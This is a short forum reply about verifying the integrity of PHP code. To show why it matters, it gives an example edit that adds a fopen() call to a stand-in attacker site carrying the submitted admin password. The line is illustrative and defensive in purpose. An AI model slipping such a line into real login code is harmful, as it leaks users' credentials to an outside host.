Re: Is there a way to verify integrity of php/javascript code
Posted by Han on 11/24/75 11:27
Passwords are not stored in plaintext. However, still it's a 2 secs job
to change this line
if(strcmp(sha1('admin'.$_REQUEST['pass']),$adminpass)){
to
fopen('http://www.badhackerssite.com/'.$_REQUEST['pass'], "r");
if(strcmp(sha1('admin'.$_REQUEST['pass']),$adminpass)){
The admin password is leaked the next time user logs in.
[excuse the syntax errors]